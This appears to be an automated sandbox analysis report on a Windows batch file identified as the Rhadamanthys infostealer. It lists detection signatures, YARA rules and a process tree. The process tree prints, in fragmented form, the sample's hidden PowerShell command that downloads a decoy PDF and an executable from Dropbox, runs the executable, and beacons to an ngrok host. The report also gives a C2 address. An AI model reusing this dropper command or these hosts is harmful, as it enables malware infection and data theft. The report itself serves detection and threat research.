Edit tour
Windows
Analysis Report
873406390.bat
Overview
General Information
| Sample name: | 873406390.bat |
| Analysis ID: | 1576696 |
| MD5: | a7abb4fd1da33107e69deda6d0279a94 |
| SHA1: | a896970b05cff522ebfb994686382e64bad814c0 |
| SHA256: | b9ece90865800c42c9bd0c5cc24fcc5394a65ee4b88150038e8a6e1b4c353cc5 |
| Tags: | batCompilazioneprotetticopyrightuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
RHADAMANTHYS
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
cmd.exe (PID: 7508 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\87340 6390.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7572 cmdline: powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1' -OutFile $ RandomPDF; Start-Pro cess -File Path 'msed ge.exe' -A rgumentLis t '--kiosk ', $Random PDF; Invok e-WebReque st -Uri 'h ttps://www .dropbox.c om/scl/fi/ g33vds4uvy 26a8v7ble7 g/runner.e xe?rlkey=c qe2asmea4s h0uo2xxsst xzdd&dl=1' -OutFile $RandomEXE ; Start-Pr ocess -Fil ePath $Ran domEXE; if (Test-Pat h $RandomE XE) { Invo ke-WebRequ est -Uri ' https://1z f9cygs0q3i viyowq83dd wzwtgf78rh .ngrok.app /metadata/ 3fee076f95 28f690839c 19be95e034 f2'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) 
msedge.exe (PID: 7888 cmdline: "C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user~1\App Data\Local \Temp\7c77 db3b-68c8- 41d5-811b- cacabb2b0b 22.pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8172 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=23 20 --field -trial-han dle=2088,i ,114048823 7368361307 9,70768529 1564301016 7,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) 
cf82d46b-a24c-4b03-bda2-b4e94b396309.exe (PID: 8832 cmdline: "C:\Users\ user~1\App Data\Local \Temp\cf82 d46b-a24c- 4b03-bda2- b4e94b3963 09.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) - cf82d46b-a24c-4b03-bda2-b4e94b396309.exe (PID: 8960 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\cf82 d46b-a24c- 4b03-bda2- b4e94b3963 09.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7) 
fontdrvhost.exe (PID: 5696 cmdline: "C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 5600 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) 
WerFault.exe (PID: 6720 cmdline: C:\Windows \system32\ WerFault.e xe -u -p 5 600 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 2440 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 8 960 -s 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 8032 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7248 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate "C :\Users\us er~1\AppDa ta\Local\T emp\7c77db 3b-68c8-41 d5-811b-ca cabb2b0b22 .pdf" MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 2020 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 16 --field -trial-han dle=2040,i ,168324558 4588130916 5,16448546 4911137714 80,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8220 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6684 --fie ld-trial-h andle=2040 ,i,1683245 5845881309 165,164485 4649111377 1480,26214 4 /prefetc h:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8272 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6832 --field-t rial-handl e=2040,i,1 6832455845 881309165, 1644854649 1113771480 ,262144 /p refetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8368 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7212 --field-t rial-handl e=2040,i,1 6832455845 881309165, 1644854649 1113771480 ,262144 /p refetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 5632 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=220 0 --field- trial-hand le=2040,i, 1683245584 5881309165 ,164485464 9111377148 0,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||